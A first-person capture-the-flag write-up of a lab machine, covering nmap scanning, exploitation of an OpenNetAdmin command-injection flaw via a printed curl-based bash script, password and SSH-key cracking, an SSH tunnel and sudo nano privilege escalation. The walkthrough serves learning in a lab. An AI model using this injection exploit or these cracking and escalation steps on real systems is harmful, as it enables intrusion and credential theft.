This was a really fun box so figured I would do a writeup on it.
As usual I started with a scan of all TCP ports, this time using:
sudo nmap -sS -sV -p- -T4 -v 10.10.10.171
This found two open ports, SSH and a web server running Apache 2.4.29
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Browsing to the webpage shows the default apache install index.html page
No robots.txt or any other low hanging fruit pages like wp-admin etc. Onto dirbusting.
I use zap web proxy for most of my dirbusting now as i find it just easier to use as it encompasses so many web app tools all in one and is free unlike burp suit.
The scan quickly finds that the server appears to be hosting multiple webpages. An artwork website and a music website aswell as a folder named "ona".
Browsing both websites does not reveal too much information so I checked out the ona folder which took me to a network administration page using OpenNetAdmin. Interesting...
Trying random default credentials logged me in as admin:admin however there was nothing of value here anymore than the guest page. It does however show its version number. A quick check via searchsploit found a RCE vulerability:
It appears to be a curl command that echos requests and responses and then cuts out the response using SED.
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/EN><SNIPPED>
done
Running the shell script against the ona directory gets us a limited shell:
Basic enumeration of users finds jimmy and joanna none of which have read all on their home folders. No flag yet!
I did try a pop a stable shell using netcat, python and all the usual tricks but was unsuccessful so being that I already have a shell I decided to just use what I had to further enumerate the machine. Eventually searching for php files found a bunch of configuration files including a databases settings file.
find / -type f -name "*.php" 2> /dev/null
Catting out the file finds a cleartext password "n1nj4W4rri0R!".
Being in a limited shell I was unable to connect the mysqli database so I tried to ssh in as joanna and jimmy and was able to gain access as jimmy. Still no flag however meaning I must have to do some horizontal priv esc and get to Joannas account. More enumeration!
Right away I notice jimmy is part of a group called "internal" which sparks my interest so after initual enumeration steps of jimmy's home folder I run a search for all files with internal group ownership and find 3 php files. Interesting...
Catting out index.php reveals a login page that is comparing a sha512 hash and jimmy as the username.
Being that the has in unsalted and this is a CTF machine I decided to use crackstations website instead of using hashcat locally to crack the hash which successfully cracks as "Revealed"
Trying to switch user to root and joannas account did not work so further enumeration of the php files is needed. The main.php file is catting out joannas ssh private key to a html page. So browsing to that page and logging in with jimmy with password "Revealed" will give us joannas id_rsa key.
Browsing to the internal folder in a web browser does not work. The html and ona folders are the only folders accessable from the outside on port 80. I tried to move the php files into the html and ona directories but lacked the permissions. Checking for listening ports found port 52846 listening. Interesting...
Time for an SSH tunnel to access this port. Anything going to port 52846 on my computer will be forwarded to port 52846 to the remote computer via SSH.
ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171
Browsing to http://127.0.0.1:52846 brings us to the internal webpage.
Logging in with jimmy:Revealed gives us joannas private SSH key.
Using this key I find that it is password protected... I did figure that would be the case given the hint under the key above...
Time to crack the key. Trying jimmy's ninja password did not work as well as a few variations.
/usr/share/john/ssh2john.py id_rsa > joannas_key
Extracting the hash using ssh2john gets us the hash that I run through john the ripper and get the password of bloodninjas which I can then use to login to joannas account.
After getting the user flag I begin inital enumeration and find some no password sudo privileges.
Trying sudo /bin/nano still requires a password aswell as sudo /opt/priv. Trying them both together opens nano as super user.
sudo /bin/nano /opt/priv
Off to GTFO out bins to find the syntax that will drop me to a shell with super user permissions.
At first it does not look like it worked due to a screen refresh issue on nano but running the id command confirms we have dropped into a shell as root.
I really enjoyed this box as it encompassed a good mix of exploit research, enumeration, pivoting, horizontal movement and thinking outside the box. All up this box took me around 2 and a bit hours from boot to root.
